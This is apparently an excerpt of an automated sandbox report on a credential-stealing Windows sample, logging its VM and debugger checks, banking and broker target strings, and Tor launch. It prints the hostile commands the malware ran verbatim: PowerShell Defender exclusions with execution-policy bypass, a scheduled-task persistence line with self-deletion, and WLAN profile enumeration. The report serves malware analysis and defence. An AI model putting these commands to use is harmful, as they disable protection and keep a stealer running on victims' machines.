                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598594s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598469s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598360s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598235s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -598110s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597985s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597860s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597735s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597610s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597485s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597360s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597235s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -597110s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596985s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596860s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596735s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596610s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596485s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596360s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596235s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -596110s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595985s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595860s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595735s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595610s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595485s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595360s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595235s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -595110s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594985s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594860s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594735s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594610s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594485s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594360s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594235s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -594096s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 7604Thread sleep time: -593969s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 1100Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 1632Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6096Thread sleep time: -10145709240540247s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 4764Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe TID: 3528Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1856Thread sleep time: -9223372036854770s >= -30000s
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599891
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599782
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599657
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599532
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599422
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599313
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599188
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 599063
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598938
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598813
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598703
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598594
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598469
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 598110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 597110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 595110
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594985
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594860
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594735
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594610
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594485
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594360
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594235
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 594096
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 593969
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: ffmaba.exe, 0000000B.00000002.2257333436.00000000028B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qemut-cq
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: ffmaba.exe, 0000000B.00000002.2257333436.00000000028B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware`,cq
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: tor-real.exe, 00000019.00000002.4506475775.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, tor-real.exe, 00000019.00000003.2580669352.0000000003B85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4hQpFIf62HGFSgFPpC9pEuCY6ucujJf6Ftb2YTL+QvzBv4j65ro8p+uPnTzWQTQb
                Source: yt7dW9nyJK.exe, 00000000.00000002.2067271416.0000000000640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: tor-real.exe, 00000019.00000003.2603770446.0000000003B67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
                Source: yt7dW9nyJK.exe, 00000004.00000002.4503685491.0000000000E14000.00000004.00000020.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4567101003.0000000008BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: ffmaba.exe, 0000000B.00000002.2257333436.00000000028B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: veew:vmware
                Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: dsMWdeSqEmuJJIBpLr
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: tor-real.exe, 00000019.00000003.2513085213.0000000003B5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IZLX8lNvJiqIXS9BPkTdcJG0LMdDTHgfSJsXP51YJFT3GhWGMmVcI3q8+JfiRaM+
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: tor-real.exe, 00000019.00000002.4504777802.000000000105E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
                Source: ffmaba.exe, 0000000B.00000002.2262375658.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2255035504.0000000002590000.00000004.08000000.00040000.00000000.sdmp, ffmaba.exe, 0000000B.00000002.2262375658.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2332127774.0000000003BB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qemu'T
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: nde7wqEmuJ
                Source: tor-real.exe, 00000019.00000002.4508537239.00000000059E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4Z7HsFL3Y/X5CqfwtTJvNNbhGfSyZTok9JiO/lGEurgMLddZED/0WVWtcZ/YAH7k
                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeCode function: 4_2_02A91DF4 CheckRemoteDebuggerPresent,4_2_02A91DF4
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Process created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exe Process created: C:\Users\user\AppData\Local\Temp\ffmaba.exe "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 3
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /R /C:"[ ]:[ ]"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "SSID BSSID Signal"
